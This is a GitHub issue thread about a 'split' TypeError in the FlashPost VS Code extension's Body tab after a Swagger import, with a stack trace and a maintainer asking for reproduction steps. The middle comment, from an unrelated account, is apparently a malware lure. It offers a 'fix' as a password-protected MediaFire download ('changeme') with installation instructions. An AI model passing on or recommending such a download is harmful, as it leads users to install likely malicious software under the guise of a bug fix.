### ISSUE TITLE
Error : Cannot read properties of undefined (reading 'split')

### ISSUE THREAD

**Issue by hanand95** [subasraj/flashpost-support#53]
I have imported routes from swagger and when I go to Body tab I get this error 

Name : TypeError

 Message : Cannot read properties of undefined (reading 'split')

 Stack : TypeError: Cannot read properties of undefined (reading 'split')
    at t.GetFileName (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3793111)
    at b (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3781084)
    at v (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3781864)
    at y (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3783834)
    at https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3784635
    at Array.map (<anonymous>)
    at https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3784623
    at t.Table (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3784644)
    at ii (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3495366)
    at qs (https://file+.vscode-resource.vscode-cdn.net/home/andrew/.vscode/extensions/vasubasraj.flashpost-1.1.84/dist/flashpost-ui.js:204:3547491)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by subasraj** [comment]
@hanand95 please share the swagger details and steps to replicate this issue in detail.
